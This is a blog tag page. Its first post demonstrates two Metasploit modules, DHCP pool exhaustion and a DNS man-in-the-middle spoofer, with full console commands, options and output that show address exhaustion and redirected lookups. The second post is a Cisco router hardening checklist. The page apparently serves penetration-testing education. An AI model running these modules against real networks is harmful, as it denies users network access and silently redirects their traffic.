Security | RootAdmin.co.uk

Tag: security

DHCP Exhaustion and DNS MiTM

by Rootadmin on Mar.14, 2010, under Uncategorized

DigiNinja has created a meta sploit module for a DHCP Exhaustion attack tool which continues to request DHCP addresses till it stops getting responses from the server which, as far as I can tell, means the IP pool is exhausted ( meaning that no there are no available address’s from DHCP and a computer set to get a DHCP address cant get on the network – a very nice idea for a Denial of Service Attack in my oppinion.

He has also created a DNS Man in The Middle module which has been worked on by various people, the last being Wesley McGrew who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.

See http://www.digininja.org/metasploit/dns_dhcp_beta.php

Usage

You’ll need to be root to run both modules and for the DHCP module you’ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are…

DHCP Exhaustion


msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) > run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed

DNS MiTM


msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file

The hosts file contains a single entry


192.168.0.2 google.com

Now do some look ups, google.com and bbc.co.uk


nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138

Google is middled but the BBC gets through, now add the BBC to the hosts file


echo "192.168.0.2 bbc.co.uk" >> dns.txt

Refresh the server by looking up the special domain and then check the BBC again


> digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2

The BBC is now ours!

Leave a Comment :admin, application, attack, development, dhcp, digininja, DNS, ethical, exhaustion, fake, freedom, hack, hacking, jasager, karma, liam, Liam Somerville, madwifi, mitm, network, ninja, open source, penetration, projects, root, rootadmin, rootadmin.co.uk, security, site, software, somerville, testing, web, website, wifi more...

Harden your cisco router

by Rootadmin on Jul.18, 2009, under Cisco

Commmand	Description
no ip tcp-small-servers	If you disable the minor TCP/IP servers, access to the Echo, Discard, Chargen, and Daytime ports cause the Cisco IOS® software to send a TCP RESET packet to the sender and discard the original incoming packet.
no ip udp-small-servers	If you disable the servers, access to Echo, Discard, and Chargen ports causes the Cisco IOS® software to send an “ICMP port unreachable” message to the sender and discard the original incoming packet.
no ip bootp server	This will send an ICMP port unreachable message to the sender and discard the original incoming packet
no service finger	This is the equivalent of a remote show users command – disable it
no ip source route	Disallow IP Source routing.
no ip ident	IP Identd will return accurate information about the host TCP port, disabled this
no ip http server	This is very important considering IOS® HTTP Authorization vulnerability. This will remove the ability to use http to manage Cisco devices.
no ip http secure-server	This is very important considering IOS® HTTP Authorization vulnerability. This will remove the ability to use http to manage Cisco devices.
no cdp run	to prevent reconnaissance against yoru network
ntp disable	If you need to run NTP, run NTP securely
(Config-if) shutdown	Shutdown all unused interfaces
(Config-if) no ip proxy-arp	This prevents internal addresses from being revealed
(Config-if)no ip directed-broadcast	Apply this to all interfaces that shouldn’t forward legitimate directed broadcasts

Leave a Comment :(Config-if) no ip proxy-arp, (Config-if) shutdown, (Config-if)no ip directed-broadcast, admin, Cisco, harden cisco router, liam, Liam Somerville, no cdp run, no ip bootp server, no ip http secure-server, no ip http server, no ip ident, no ip source route, no ip tcp-small-servers, no ip udp-small-servers, no service finger, ntp disable, root, rootadmin, rootadmin.co.uk, secure, security, somerville, tighten more...

Howdy. Welcome to RootAdmin.co.uk!
Thanks for dropping by! Feel free to stay updated by subscribing to the RSS feed. See ya around!
Recent Posts
Categories
- Cisco (9)
- Life's Questions (16)
- Linux (2)
- Linux tutorial (1)
- Microsoft (4)
- Office (1)
- Other (31)
- TANDEM/HP NonStop (1)
- Uncategorized (11)
- Windows (5)
Links

Categories
- Cisco
- Life's Questions
- Linux
  - Linux tutorial
- Microsoft
  - Office
  - Windows
- Other
- TANDEM/HP NonStop
- Uncategorized

RootAdmin.co.uk

Tag: security

DHCP Exhaustion and DNS MiTM

DHCP Exhaustion

DNS MiTM

Harden your cisco router

Howdy. Welcome to RootAdmin.co.uk!

Recent Posts

Categories

Links

Categories

Looking for something?

Links!

Archives